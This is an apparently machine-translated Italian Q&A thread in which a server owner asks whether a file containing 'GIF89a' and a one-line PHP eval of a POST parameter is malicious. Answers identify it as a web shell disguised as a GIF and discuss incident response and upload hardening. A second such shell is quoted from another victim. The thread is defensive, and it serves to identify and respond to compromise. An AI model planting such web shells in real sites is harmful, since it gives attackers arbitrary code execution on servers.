Questo file PHP contiene un'eval in una variabile POST un'indicazione di compromesso?

2

Ho trovato questo file sul mio server, contiene il seguente codice:

GIF89a
<?php eval ($_POST[plm12345plm]); ?>

Non c'è altro codice oltre quello sopra. È dannoso?

    
posta Ben Bibikov 04.05.2015 - 23:25
fonte

3 risposte

8

Sì, questo è ladro. Questo script eseguirà qualsiasi codice PHP passato come plm12345plm parametro POST. Ciò significa che un utente malintenzionato può eseguire PHP arbitrario e, a seconda della configurazione del server, un ulteriore codice sul server.

La prima riga GIF89a è probabilmente posizionata in modo da ignorare la verifica dei file di base durante il caricamento dello script come immagine GIF.

Se il file potrebbe essere effettivamente eseguito, considera il server come compromesso . Se non è eseguibile direttamente , potrebbe comunque essere sfruttato utilizzando attacchi di inclusione di file locali .

    
risposta data 04.05.2015 - 23:37
fonte
4

Sì, questa è una shell Web PHP. Eval dovrebbe essere la bandiera rossa.

In sostanza, se l'utente può accedere a questo file sul tuo server, potrebbe essere in grado di eseguire i comandi del sistema operativo. Se hai correttamente implementato il tuo sito, l'hacker non dovrebbe essere in grado di ingannare PHP nell'eseguire il codice in quello che sto assumendo sia un file .GIF.

Tuttavia, se fossi in te, chiuderei i boccaporti e avvii le procedure di risposta agli incidenti. Qualcuno ha sicuramente tentato di irrompere, e senza ulteriori ricerche, non saprai se ci sono riusciti.

    
risposta data 04.05.2015 - 23:37
fonte
-1

Il mio server è stato violato con lo stesso metodo. My Server ISP ha visto un enorme carico di rete e ha portato il server offline e mi ha informato.

Il file ali.jpg ha un codice testuale: GIF89a?lovealihack <?php eval($_POST[alihackxx])?>

Questo file era in attesa almeno dall'inizio del 2015 (l'ho rintracciato nei miei backup). Si trova nell'URL del sito scrivibile / userfiles / directory di immagini. Quando viene chiamato da un modulo esterno con alihackxx variabile e metodo POST contenente codice PHP nella variabile, Apache Server lo eseguirà come utente di www-data e contaminerà TUTTI i siti con una directory scrivibile Media, FILE e molto di JPG e PHP file da attaccare su altri server.

Probabilmente è causato dal (vecchio) FCKeditor che uso su tutti i siti, che consente all'utente di caricare un'immagine che verrà inserita nella pagina del sito degli utenti. C'è anche un modo per spingere i dati in un sito scrivibile / directory scrivibile tramite il metodo PUT. È possibile disattivare l'uso di questo metodo.

Soluzione / prevenzione immediata:
Sono scioccato nel vedere una vulnerabilità così semplice. Ho delle brutte sensazioni riguardo all'essere hackerato. Ho cambiato tutto (sito URL) 777 (directory scrivibili) in 755 scrivibili solo per utenti FTP / server, quindi Apache (utente www-data) non può più scrivere in esso.

di ToDo:
I miei clienti devono ancora caricare JPG, MP3 e PDF. Devono passare un gateway di caricamento corretto che legge il file per% dannoso <?php e eval(

Inoltre non è divertente regolare i moduli di posta con allegati di file. È importante che l'allegato del file non si trovi in una directory URL / scrivibile del sito.

Spero di averti informato su questo server e sperare che tu possa impedire che il tuo server venga violato.

    
risposta data 07.11.2015 - 21:52
fonte

Leggi altre domande sui tag